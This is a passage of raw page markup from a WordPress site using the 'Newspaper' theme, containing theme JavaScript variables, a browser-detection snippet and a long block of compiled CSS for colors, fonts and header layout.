this.is_ajax_running = false; this.td_user_action = ''; // load more or infinite loader (used by the animation) this.header_color = ''; this.ajax_pagination_infinite_stop = ''; //show load more at page x } // td_js_generator - mini detector (function(){ var htmlTag = document.getElementsByTagName("html")[0]; if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) { htmlTag.className += ' ie10'; } if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) { htmlTag.className += ' ie11'; } if ( navigator.userAgent.indexOf("Edge") > -1 ) { htmlTag.className += ' ieEdge'; } if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) { htmlTag.className += ' td-md-is-ios'; } var user_agent = navigator.userAgent.toLowerCase(); if ( user_agent.indexOf("android") > -1 ) { htmlTag.className += ' td-md-is-android'; } if ( -1 !== navigator.userAgent.indexOf('Mac OS X') ) { htmlTag.className += ' td-md-is-os-x'; } if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) { htmlTag.className += ' td-md-is-chrome'; } if ( -1 !== navigator.userAgent.indexOf('Firefox') ) { htmlTag.className += ' td-md-is-firefox'; } if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) { htmlTag.className += ' td-md-is-safari'; } if( -1 !== navigator.userAgent.indexOf('IEMobile') ){ htmlTag.className += ' td-md-is-iemobile'; } })(); var tdLocalCache = {}; ( function () { "use strict"; tdLocalCache = { data: {}, remove: function (resource_id) { delete tdLocalCache.data[resource_id]; }, exist: function (resource_id) { return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null; }, get: function (resource_id) { return tdLocalCache.data[resource_id]; }, set: function (resource_id, cachedData) { tdLocalCache.remove(resource_id); tdLocalCache.data[resource_id] = cachedData; } }; })(); var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}]; var td_animation_stack_effect="type0"; var tds_animation_stack=true; var td_animation_stack_specific_selectors=".entry-thumb, img"; var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img"; var td_ajax_url="https:\/\/www.socialistalternative.org\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=9.5"; var td_get_template_directory_uri="https:\/\/www.socialistalternative.org\/wp-content\/themes\/Newspaper"; var tds_snap_menu="snap"; var tds_logo_on_sticky="show_header_logo"; var tds_header_style="4"; var td_please_wait="Please wait..."; var td_email_user_pass_incorrect="User or password incorrect!"; var td_email_user_incorrect="Email or username incorrect!"; var td_email_incorrect="Email incorrect!"; var tds_more_articles_on_post_enable=""; var tds_more_articles_on_post_time_to_wait=""; var tds_more_articles_on_post_pages_distance_from_top=0; var tds_theme_color_site_wide="#cc1a0e"; var tds_smart_sidebar="enabled"; var tdThemeName="Newspaper"; var td_magnific_popup_translation_tPrev="Previous (Left arrow key)"; var td_magnific_popup_translation_tNext="Next (Right arrow key)"; var td_magnific_popup_translation_tCounter="%curr% of %total%"; var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded."; var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded."; var tdDateNamesI18n={"month_names":["January","February","March","April","May","June","July","August","September","October","November","December"],"month_names_short":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"day_names":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"day_names_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]}; var td_ad_background_click_link=""; var td_ad_background_click_target=""; </script> <!-- Header style compiled by theme --> <style> .td-header-wrap .black-menu .sf-menu > .current-menu-item > a, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a, .td-header-wrap .black-menu .sf-menu > li > a:hover, .td-header-wrap .black-menu .sf-menu > .sfHover > a, .td-header-style-12 .td-header-menu-wrap-full, .sf-menu > .current-menu-item > a:after, .sf-menu > .current-menu-ancestor > a:after, .sf-menu > .current-category-ancestor > a:after, .sf-menu > li:hover > a:after, .sf-menu > .sfHover > a:after, .td-header-style-12 .td-affix, .header-search-wrap .td-drop-down-search:after, .header-search-wrap .td-drop-down-search .btn:hover, input[type=submit]:hover, .td-read-more a, .td-post-category:hover, .td-grid-style-1.td-hover-1 .td-big-grid-post:hover .td-post-category, .td-grid-style-5.td-hover-1 .td-big-grid-post:hover .td-post-category, .td_top_authors .td-active .td-author-post-count, .td_top_authors .td-active .td-author-comments-count, .td_top_authors .td_mod_wrap:hover .td-author-post-count, .td_top_authors .td_mod_wrap:hover .td-author-comments-count, .td-404-sub-sub-title a:hover, .td-search-form-widget .wpb_button:hover, .td-rating-bar-wrap div, .td_category_template_3 .td-current-sub-category, .dropcap, .td_wrapper_video_playlist .td_video_controls_playlist_wrapper, .wpb_default, .wpb_default:hover, .td-left-smart-list:hover, .td-right-smart-list:hover, .woocommerce-checkout .woocommerce input.button:hover, .woocommerce-page .woocommerce a.button:hover, .woocommerce-account div.woocommerce .button:hover, #bbpress-forums button:hover, .bbp_widget_login .button:hover, .td-footer-wrapper .td-post-category, .td-footer-wrapper .widget_product_search input[type="submit"]:hover, .woocommerce .product a.button:hover, .woocommerce .product #respond input#submit:hover, .woocommerce .checkout input#place_order:hover, .woocommerce .woocommerce.widget .button:hover, .single-product .product .summary .cart .button:hover, .woocommerce-cart .woocommerce table.cart .button:hover, .woocommerce-cart .woocommerce .shipping-calculator-form .button:hover, .td-next-prev-wrap a:hover, .td-load-more-wrap a:hover, .td-post-small-box a:hover, .page-nav .current, .page-nav:first-child > div, .td_category_template_8 .td-category-header .td-category a.td-current-sub-category, .td_category_template_4 .td-category-siblings .td-category a:hover, #bbpress-forums .bbp-pagination .current, #bbpress-forums #bbp-single-user-details #bbp-user-navigation li.current a, .td-theme-slider:hover .slide-meta-cat a, a.vc_btn-black:hover, .td-trending-now-wrapper:hover .td-trending-now-title, .td-scroll-up, .td-smart-list-button:hover, .td-weather-information:before, .td-weather-week:before, .td_block_exchange .td-exchange-header:before, .td_block_big_grid_9.td-grid-style-1 .td-post-category, .td_block_big_grid_9.td-grid-style-5 .td-post-category, .td-grid-style-6.td-hover-1 .td-module-thumb:after, .td-pulldown-syle-2 .td-subcat-dropdown ul:after, .td_block_template_9 .td-block-title:after, .td_block_template_15 .td-block-title:before, div.wpforms-container .wpforms-form div.wpforms-submit-container button[type=submit] { background-color: #cc1a0e; } .td_block_template_4 .td-related-title .td-cur-simple-item:before { border-color: #cc1a0e transparent transparent transparent !important; } .woocommerce .woocommerce-message .button:hover, .woocommerce .woocommerce-error .button:hover, .woocommerce .woocommerce-info .button:hover { background-color: #cc1a0e !important; } .td_block_template_4 .td-related-title .td-cur-simple-item, .td_block_template_3 .td-related-title .td-cur-simple-item, .td_block_template_9 .td-related-title:after { background-color: #cc1a0e; } .woocommerce .product .onsale, .woocommerce.widget .ui-slider .ui-slider-handle { background: none #cc1a0e; } .woocommerce.widget.widget_layered_nav_filters ul li a { background: none repeat scroll 0 0 #cc1a0e !important; } a, cite a:hover, .td_mega_menu_sub_cats .cur-sub-cat, .td-mega-span h3 a:hover, .td_mod_mega_menu:hover .entry-title a, .header-search-wrap .result-msg a:hover, .td-header-top-menu .td-drop-down-search .td_module_wrap:hover .entry-title a, .td-header-top-menu .td-icon-search:hover, .td-header-wrap .result-msg a:hover, .top-header-menu li a:hover, .top-header-menu .current-menu-item > a, .top-header-menu .current-menu-ancestor > a, .top-header-menu .current-category-ancestor > a, .td-social-icon-wrap > a:hover, .td-header-sp-top-widget .td-social-icon-wrap a:hover, .td-page-content blockquote p, .td-post-content blockquote p, .mce-content-body blockquote p, .comment-content blockquote p, .wpb_text_column blockquote p, .td_block_text_with_title blockquote p, .td_module_wrap:hover .entry-title a, .td-subcat-filter .td-subcat-list a:hover, .td-subcat-filter .td-subcat-dropdown a:hover, .td_quote_on_blocks, .dropcap2, .dropcap3, .td_top_authors .td-active .td-authors-name a, .td_top_authors .td_mod_wrap:hover .td-authors-name a, .td-post-next-prev-content a:hover, .author-box-wrap .td-author-social a:hover, .td-author-name a:hover, .td-author-url a:hover, .td_mod_related_posts:hover h3 > a, .td-post-template-11 .td-related-title .td-related-left:hover, .td-post-template-11 .td-related-title .td-related-right:hover, .td-post-template-11 .td-related-title .td-cur-simple-item, .td-post-template-11 .td_block_related_posts .td-next-prev-wrap a:hover, .comment-reply-link:hover, .logged-in-as a:hover, #cancel-comment-reply-link:hover, .td-search-query, .td-category-header .td-pulldown-category-filter-link:hover, .td-category-siblings .td-subcat-dropdown a:hover, .td-category-siblings .td-subcat-dropdown a.td-current-sub-category, .widget a:hover, .td_wp_recentcomments a:hover, .archive .widget_archive .current, .archive .widget_archive .current a, .widget_calendar tfoot a:hover, .woocommerce a.added_to_cart:hover, .woocommerce-account .woocommerce-MyAccount-navigation a:hover, #bbpress-forums li.bbp-header .bbp-reply-content span a:hover, #bbpress-forums .bbp-forum-freshness a:hover, #bbpress-forums .bbp-topic-freshness a:hover, #bbpress-forums .bbp-forums-list li a:hover, #bbpress-forums .bbp-forum-title:hover, #bbpress-forums .bbp-topic-permalink:hover, #bbpress-forums .bbp-topic-started-by a:hover, #bbpress-forums .bbp-topic-started-in a:hover, #bbpress-forums .bbp-body .super-sticky li.bbp-topic-title .bbp-topic-permalink, #bbpress-forums .bbp-body .sticky li.bbp-topic-title .bbp-topic-permalink, .widget_display_replies .bbp-author-name, .widget_display_topics .bbp-author-name, .footer-text-wrap .footer-email-wrap a, .td-subfooter-menu li a:hover, .footer-social-wrap a:hover, a.vc_btn-black:hover, .td-smart-list-dropdown-wrap .td-smart-list-button:hover, .td_module_17 .td-read-more a:hover, .td_module_18 .td-read-more a:hover, .td_module_19 .td-post-author-name a:hover, .td-instagram-user a, .td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more span, .td-pulldown-syle-2 .td-subcat-dropdown:hover .td-subcat-more i, .td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more span, .td-pulldown-syle-3 .td-subcat-dropdown:hover .td-subcat-more i, .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-display-option:hover, .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-display-option:hover i, .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-link:hover, .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-item .td-cur-simple-item, .td_block_template_2 .td-related-title .td-cur-simple-item, .td_block_template_5 .td-related-title .td-cur-simple-item, .td_block_template_6 .td-related-title .td-cur-simple-item, .td_block_template_7 .td-related-title .td-cur-simple-item, .td_block_template_8 .td-related-title .td-cur-simple-item, .td_block_template_9 .td-related-title .td-cur-simple-item, .td_block_template_10 .td-related-title .td-cur-simple-item, .td_block_template_11 .td-related-title .td-cur-simple-item, .td_block_template_12 .td-related-title .td-cur-simple-item, .td_block_template_13 .td-related-title .td-cur-simple-item, .td_block_template_14 .td-related-title .td-cur-simple-item, .td_block_template_15 .td-related-title .td-cur-simple-item, .td_block_template_16 .td-related-title .td-cur-simple-item, .td_block_template_17 .td-related-title .td-cur-simple-item, .td-theme-wrap .sf-menu ul .td-menu-item > a:hover, .td-theme-wrap .sf-menu ul .sfHover > a, .td-theme-wrap .sf-menu ul .current-menu-ancestor > a, .td-theme-wrap .sf-menu ul .current-category-ancestor > a, .td-theme-wrap .sf-menu ul .current-menu-item > a, .td_outlined_btn, .td_block_categories_tags .td-ct-item:hover { color: #cc1a0e; } a.vc_btn-black.vc_btn_square_outlined:hover, a.vc_btn-black.vc_btn_outlined:hover, .td-mega-menu-page .wpb_content_element ul li a:hover, .td-theme-wrap .td-aj-search-results .td_module_wrap:hover .entry-title a, .td-theme-wrap .header-search-wrap .result-msg a:hover { color: #cc1a0e !important; } .td-next-prev-wrap a:hover, .td-load-more-wrap a:hover, .td-post-small-box a:hover, .page-nav .current, .page-nav:first-child > div, .td_category_template_8 .td-category-header .td-category a.td-current-sub-category, .td_category_template_4 .td-category-siblings .td-category a:hover, #bbpress-forums .bbp-pagination .current, .post .td_quote_box, .page .td_quote_box, a.vc_btn-black:hover, .td_block_template_5 .td-block-title > *, .td_outlined_btn { border-color: #cc1a0e; } .td_wrapper_video_playlist .td_video_currently_playing:after { border-color: #cc1a0e !important; } .header-search-wrap .td-drop-down-search:before { border-color: transparent transparent #cc1a0e transparent; } .block-title > span, .block-title > a, .block-title > label, .widgettitle, .widgettitle:after, .td-trending-now-title, .td-trending-now-wrapper:hover .td-trending-now-title, .wpb_tabs li.ui-tabs-active a, .wpb_tabs li:hover a, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a, .td_block_template_1 .td-related-title .td-cur-simple-item, .woocommerce .product .products h2:not(.woocommerce-loop-product__title), .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more, .td_3D_btn, .td_shadow_btn, .td_default_btn, .td_round_btn, .td_outlined_btn:hover { background-color: #cc1a0e; } .woocommerce div.product .woocommerce-tabs ul.tabs li.active { background-color: #cc1a0e !important; } .block-title, .td_block_template_1 .td-related-title, .wpb_tabs .wpb_tabs_nav, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container, .woocommerce div.product .woocommerce-tabs ul.tabs:before { border-color: #cc1a0e; } .td_block_wrap .td-subcat-item a.td-cur-simple-item { color: #cc1a0e; } .td-grid-style-4 .entry-title { background-color: rgba(204, 26, 14, 0.7); } .td-header-wrap .td-header-top-menu-full, .td-header-wrap .top-header-menu .sub-menu { background-color: #174970; } .td-header-style-8 .td-header-top-menu-full { background-color: transparent; } .td-header-style-8 .td-header-top-menu-full .td-header-top-menu { background-color: #174970; padding-left: 15px; padding-right: 15px; } .td-header-wrap .td-header-top-menu-full .td-header-top-menu, .td-header-wrap .td-header-top-menu-full { border-bottom: none; } .td-header-wrap .td-header-sp-top-widget i.td-icon-font:hover { color: #ea2e2e; } .td-header-wrap .td-header-menu-wrap-full, .td-header-menu-wrap.td-affix, .td-header-style-3 .td-header-main-menu, .td-header-style-3 .td-affix .td-header-main-menu, .td-header-style-4 .td-header-main-menu, .td-header-style-4 .td-affix .td-header-main-menu, .td-header-style-8 .td-header-menu-wrap.td-affix, .td-header-style-8 .td-header-top-menu-full { background-color: #ea2e2e; } .td-boxed-layout .td-header-style-3 .td-header-menu-wrap, .td-boxed-layout .td-header-style-4 .td-header-menu-wrap, .td-header-style-3 .td_stretch_content .td-header-menu-wrap, .td-header-style-4 .td_stretch_content .td-header-menu-wrap { background-color: #ea2e2e !important; } @media (min-width: 1019px) { .td-header-style-1 .td-header-sp-recs, .td-header-style-1 .td-header-sp-logo { margin-bottom: 28px; } } @media (min-width: 768px) and (max-width: 1018px) { .td-header-style-1 .td-header-sp-recs, .td-header-style-1 .td-header-sp-logo { margin-bottom: 14px; } } .td-header-style-7 .td-header-top-menu { border-bottom: none; } .td-header-menu-wrap.td-affix, .td-header-style-3 .td-affix .td-header-main-menu, .td-header-style-4 .td-affix .td-header-main-menu, .td-header-style-8 .td-header-menu-wrap.td-affix { background-color: #ea2e2e; } .sf-menu > .current-menu-item > a:after, .sf-menu > .current-menu-ancestor > a:after, .sf-menu > .current-category-ancestor > a:after, .sf-menu > li:hover > a:after, .sf-menu > .sfHover > a:after, .td_block_mega_menu .td-next-prev-wrap a:hover, .td-mega-span .td-post-category:hover, .td-header-wrap .black-menu .sf-menu > li > a:hover, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .sfHover > a, .td-header-wrap .black-menu .sf-menu > .current-menu-item > a, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a { background-color: rgba(255,255,255,0.7); } .td_block_mega_menu .td-next-prev-wrap a:hover { border-color: rgba(255,255,255,0.7); } .header-search-wrap .td-drop-down-search:before { border-color: transparent transparent rgba(255,255,255,0.7) transparent; } .td_mega_menu_sub_cats .cur-sub-cat, .td_mod_mega_menu:hover .entry-title a, .td-theme-wrap .sf-menu ul .td-menu-item > a:hover, .td-theme-wrap .sf-menu ul .sfHover > a, .td-theme-wrap .sf-menu ul .current-menu-ancestor > a, .td-theme-wrap .sf-menu ul .current-category-ancestor > a, .td-theme-wrap .sf-menu ul .current-menu-item > a { color: rgba(255,255,255,0.7); } .td-affix .sf-menu > .current-menu-item > a:after, .td-affix .sf-menu > .current-menu-ancestor > a:after, .td-affix .sf-menu > .current-category-ancestor > a:after, .td-affix .sf-menu > li:hover > a:after, .td-affix .sf-menu > .sfHover > a:after, .td-header-wrap .td-affix .black-menu .sf-menu > li > a:hover, .td-header-wrap .td-affix .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .td-affix .black-menu .sf-menu > .sfHover > a, .td-affix .header-search-wrap .td-drop-down-search:after, .td-affix .header-search-wrap .td-drop-down-search .btn:hover, .td-header-wrap .td-affix .black-menu .sf-menu > .current-menu-item > a, .td-header-wrap .td-affix .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .td-affix .black-menu .sf-menu > .current-category-ancestor > a { background-color: #ffffff; } .td-affix .header-search-wrap .td-drop-down-search:before { border-color: transparent transparent #ffffff transparent; } .td-theme-wrap .td-affix .sf-menu ul .td-menu-item > a:hover, .td-theme-wrap .td-affix .sf-menu ul .sfHover > a, .td-theme-wrap .td-affix .sf-menu ul .current-menu-ancestor > a, .td-theme-wrap .td-affix .sf-menu ul .current-category-ancestor > a, .td-theme-wrap .td-affix .sf-menu ul .current-menu-item > a { color: #ffffff; } .td-header-wrap .td-header-menu-wrap .sf-menu > li > a, .td-header-wrap .td-header-menu-social .td-social-icon-wrap a, .td-header-style-4 .td-header-menu-social .td-social-icon-wrap i, .td-header-style-5 .td-header-menu-social .td-social-icon-wrap i, .td-header-style-6 .td-header-menu-social .td-social-icon-wrap i, .td-header-style-12 .td-header-menu-social .td-social-icon-wrap i, .td-header-wrap .header-search-wrap #td-header-search-button .td-icon-search { color: #ffffff; } .td-header-wrap .td-header-menu-social + .td-search-wrapper #td-header-search-button:before { background-color: #ffffff; } .td-header-wrap .td-header-menu-wrap.td-affix .sf-menu > li > a, .td-header-wrap .td-affix .td-header-menu-social .td-social-icon-wrap a, .td-header-style-4 .td-affix .td-header-menu-social .td-social-icon-wrap i, .td-header-style-5 .td-affix .td-header-menu-social .td-social-icon-wrap i, .td-header-style-6 .td-affix .td-header-menu-social .td-social-icon-wrap i, .td-header-style-12 .td-affix .td-header-menu-social .td-social-icon-wrap i, .td-header-wrap .td-affix .header-search-wrap .td-icon-search { color: #ffffff; } .td-header-wrap .td-affix .td-header-menu-social + .td-search-wrapper #td-header-search-button:before { background-color: #ffffff; } .td-header-wrap .td-header-menu-social .td-social-icon-wrap a { color: #ffffff; } .td-header-wrap .td-header-menu-social .td-social-icon-wrap:hover i { color: rgba(255,255,255,0.7); } .td-theme-wrap .sf-menu .td-normal-menu .td-menu-item > a:hover, .td-theme-wrap .sf-menu .td-normal-menu .sfHover > a, .td-theme-wrap .sf-menu .td-normal-menu .current-menu-ancestor > a, .td-theme-wrap .sf-menu .td-normal-menu .current-category-ancestor > a, .td-theme-wrap .sf-menu .td-normal-menu .current-menu-item > a { background-color: #ea2e2e; } .td-theme-wrap .sf-menu .td-normal-menu .td-menu-item > a:hover, .td-theme-wrap .sf-menu .td-normal-menu .sfHover > a, .td-theme-wrap .sf-menu .td-normal-menu .current-menu-ancestor > a, .td-theme-wrap .sf-menu .td-normal-menu .current-category-ancestor > a, .td-theme-wrap .sf-menu .td-normal-menu .current-menu-item > a { color: #ffffff; } .td-theme-wrap .td-mega-span h3 a { color: #222222; } .td-theme-wrap .td_mega_menu_sub_cats a { color: #222222; } .td-theme-wrap .td_mod_mega_menu:hover .entry-title a, .td-theme-wrap .sf-menu .td_mega_menu_sub_cats .cur-sub-cat { color: #ea2e2e; } .td-theme-wrap .sf-menu .td-mega-menu .td-post-category:hover, .td-theme-wrap .td-mega-menu .td-next-prev-wrap a:hover { background-color: #ea2e2e; } .td-theme-wrap .td-mega-menu .td-next-prev-wrap a:hover { border-color: #ea2e2e; } @media (max-width: 767px) { body .td-header-wrap .td-header-main-menu { background-color: #ea2e2e !important; } } .td-menu-background:before, .td-search-background:before { background: rgba(0,0,0,0.8); background: -moz-linear-gradient(top, rgba(0,0,0,0.8) 0%, rgba(0,0,0,0.7) 100%); background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(0,0,0,0.8)), color-stop(100%, rgba(0,0,0,0.7))); background: -webkit-linear-gradient(top, rgba(0,0,0,0.8) 0%, rgba(0,0,0,0.7) 100%); background: -o-linear-gradient(top, rgba(0,0,0,0.8) 0%, rgba(0,0,0,0.7) 100%); background: -ms-linear-gradient(top, rgba(0,0,0,0.8) 0%, rgba(0,0,0,0.7) 100%); background: linear-gradient(to bottom, rgba(0,0,0,0.8) 0%, rgba(0,0,0,0.7) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='rgba(0,0,0,0.8)', endColorstr='rgba(0,0,0,0.7)', GradientType=0 ); } .td-mobile-content .current-menu-item > a, .td-mobile-content .current-menu-ancestor > a, .td-mobile-content .current-category-ancestor > a, #td-mobile-nav .td-menu-login-section a:hover, #td-mobile-nav .td-register-section a:hover, #td-mobile-nav .td-menu-socials-wrap a:hover i, .td-search-close a:hover i { color: #ea2e2e; } .white-popup-block:after { background: rgba(0,69,130,0.7); background: -moz-linear-gradient(45deg, rgba(0,69,130,0.7) 0%, rgba(249,64,64,0.7) 100%); background: -webkit-gradient(left bottom, right top, color-stop(0%, rgba(0,69,130,0.7)), color-stop(100%, rgba(249,64,64,0.7))); background: -webkit-linear-gradient(45deg, rgba(0,69,130,0.7) 0%, rgba(249,64,64,0.7) 100%); background: -o-linear-gradient(45deg, rgba(0,69,130,0.7) 0%, rgba(249,64,64,0.7) 100%); background: -ms-linear-gradient(45deg, rgba(0,69,130,0.7) 0%, rgba(249,64,64,0.7) 100%); background: linear-gradient(45deg, rgba(0,69,130,0.7) 0%, rgba(249,64,64,0.7) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='rgba(0,69,130,0.7)', endColorstr='rgba(249,64,64,0.7)', GradientType=0 ); } .td-header-bg:before { background-size: 100% auto; } .top-header-menu > li > a, .td-weather-top-widget .td-weather-now .td-big-degrees, .td-weather-top-widget .td-weather-header .td-weather-city, .td-header-sp-top-menu .td_data_time { font-family:"Roboto Condensed"; font-size:13px; line-height:36px; text-transform:uppercase; } ul.sf-menu > .td-menu-item > a, .td-theme-wrap .td-header-menu-social { font-family:"Roboto Condensed"; font-size:16px; line-height:70px; } .sf-menu ul .td-menu-item a { font-family:"Roboto Condensed"; font-size:14px; font-weight:bold; text-transform:uppercase; } .td_mod_mega_menu .item-details a { font-family:"Roboto Condensed"; font-size:16px; line-height:18px; font-weight:bold; } .td_mega_menu_sub_cats .block-mega-child-cats a { font-family:"Roboto Condensed"; font-weight:bold; text-transform:uppercase; } .block-title > span, .block-title > a, .widgettitle, .td-trending-now-title, .wpb_tabs li a, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab > a, .td-theme-wrap .td-related-title a, .woocommerce div.product .woocommerce-tabs ul.tabs li a, .woocommerce .product .products h2:not(.woocommerce-loop-product__title), .td-theme-wrap .td-block-title { font-family:"Roboto Condensed"; font-size:16px; line-height:34px; font-style:italic; font-weight:bold; text-transform:uppercase; } .td-theme-wrap .td-subcat-filter, .td-theme-wrap .td-subcat-filter .td-subcat-dropdown, .td-theme-wrap .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-display-option, .td-theme-wrap .td-pulldown-category { line-height: 34px; } .td_block_template_1 .block-title > * { padding-bottom: 0; padding-top: 0; } .td_module_wrap .td-module-title { font-family:"Roboto Condensed"; } .td_module_1 .td-module-title { font-size:24px; line-height:26px; font-weight:bold; } .td_module_2 .td-module-title { font-size:24px; line-height:26px; font-weight:bold; } .td_module_3 .td-module-title { font-size:36px; line-height:38px; font-weight:bold; } .td_module_4 .td-module-title { font-size:24px; line-height:26px; font-weight:bold; } .td_module_6 .td-module-title { font-size:18px; line-height:20px; font-weight:bold; } .td_block_trending_now .entry-title, .td-theme-slider .td-module-title, .td-big-grid-post .entry-title { font-family:"Roboto Condensed"; } .td_module_mx4 .td-module-title { font-size:18px; line-height:20px; font-weight:bold; } .td_module_mx6 .td-module-title { font-size:18px; line-height:20px; font-weight:bold; } .td_module_mx17 .td-module-title { font-size:36px; line-height:38px; font-weight:bold; } .td_module_mx19 .td-module-title { font-size:34px; line-height:36px; font-weight:bold; } .td_module_mx21 .td-module-title { font-size:18px; line-height:20px; font-weight:bold; } .td-big-grid-post.td-big-thumb .td-big-grid-meta, .td-big-thumb .td-big-grid-meta .entry-title { font-size:36px; line-height:38px; font-weight:bold; } .post .td-post-header .entry-title { font-family:"Roboto Condensed"; } .td-post-template-4 .td-post-header .entry-title { font-weight:bold; } .post blockquote p, .page blockquote p, .td-post-text-content blockquote p { font-family:"Roboto Condensed"; font-weight:bold; } .post .td-post-next-prev-content span { font-family:"Roboto Condensed"; } .post .td-post-next-prev-content a { font-family:"Roboto Condensed"; font-size:18px; line-height:20px; font-weight:bold; } .td_block_related_posts .entry-title a { font-family:"Roboto Condensed"; font-size:18px; line-height:20px; font-weight:bold; } .td-page-title, .woocommerce-page .page-title, .td-category-title-holder .td-page-title { font-family:"Roboto Condensed"; font-size:32px; line-height:40px; font-weight:bold; } .widget_archive a, .widget_calendar, .widget_categories a, .widget_nav_menu a, .widget_meta a, .widget_pages a, .widget_recent_comments a, .widget_recent_entries a, .widget_text .textwidget, .widget_tag_cloud a, .widget_search input, .woocommerce .product-categories a, .widget_display_forums a, .widget_display_replies a, .widget_display_topics a, .widget_display_views a, .widget_display_stats { font-family:"Roboto Condensed"; font-size:16px; line-height:20px; font-weight:bold; } .top-header-menu > li, .td-header-sp-top-menu, #td-outer-wrap .td-header-sp-top-widget .td-search-btns-wrap, #td-outer-wrap .td-header-sp-top-widget .td-social-icon-wrap { line-height: 36px; } @media (min-width: 768px) { .td-header-style-4 .td-main-menu-logo img, .td-header-style-5 .td-main-menu-logo img, .td-header-style-6 .td-main-menu-logo img, .td-header-style-7 .td-header-sp-logo img, .td-header-style-12 .td-main-menu-logo img { max-height: 70px; } .td-header-style-4 .td-main-menu-logo, .td-header-style-5 .td-main-menu-logo, .td-header-style-6 .td-main-menu-logo, .td-header-style-7 .td-header-sp-logo, .td-header-style-12 .td-main-menu-logo { height: 70px; } .td-header-style-4 .td-main-menu-logo a, .td-header-style-5 .td-main-menu-logo a, .td-header-style-6 .td-main-menu-logo a, .td-header-style-7 .td-header-sp-logo a, .td-header-style-7 .td-header-sp-logo img, .td-header-style-12 .td-main-menu-logo a, .td-header-style-12 .td-header-menu-wrap .sf-menu > li > a { line-height: 70px; } .td-header-style-7 .sf-menu, .td-header-style-7 .td-header-menu-social { margin-top: 0; } .td-header-style-7 #td-top-search { top: 0; bottom: 0; } .td-header-wrap .header-search-wrap #td-header-search-button .td-icon-search { line-height: 70px; } } /* Style generated by theme for demo: city_news */ .td-city .td-footer-wrapper .td-block-title > * { background-color: #cc1a0e !important; } .td-city .td-footer-wrapper .td-block-title > *:before { border-color: #cc1a0e transparent transparent transparent !important; } </style> <!-- ## NXS/OG ## --><!-- ## NXSOGTAGS ## --><!-- ## NXS/OG ## --> <!-- Button style compiled by theme --> <style> .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .current-menu-item > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > .sfHover > a, .tdm-menu-active-style3 .tdm-header.td-header-wrap .sf-menu > li > a:hover, .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title, .tds-button2 .tdm-btn-text, .tds-button2 i, .tds-button5:hover .tdm-btn-text, .tds-button5:hover i, .tds-button6 .tdm-btn-text, .tds-button6 i, .tdm_block_list .tdm-list-item i, .tdm_block_pricing .tdm-pricing-feature i, .tdm-social-item i { color: #cc1a0e; } .tdm-menu-active-style5 .td-header-menu-wrap .sf-menu > .current-menu-item > a, .tdm-menu-active-style5 .td-header-menu-wrap .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style5 .td-header-menu-wrap .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style5 .td-header-menu-wrap .sf-menu > li > a:hover, .tdm-menu-active-style5 .td-header-menu-wrap .sf-menu > .sfHover > a, .tds-button1, .tds-button6:after, .tds-title2 .tdm-title-line:after, .tds-title3 .tdm-title-line:after, .tdm_block_pricing.tdm-pricing-featured:before, .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header, .tds-progress-bar1 .tdm-progress-bar:after, .tds-progress-bar2 .tdm-progress-bar:after, .tds-social3 .tdm-social-item { background-color: #cc1a0e; } .tdm-menu-active-style4 .tdm-header .sf-menu > .current-menu-item > a, .tdm-menu-active-style4 .tdm-header .sf-menu > .current-menu-ancestor > a, .tdm-menu-active-style4 .tdm-header .sf-menu > .current-category-ancestor > a, .tdm-menu-active-style4 .tdm-header .sf-menu > li > a:hover, .tdm-menu-active-style4 .tdm-header 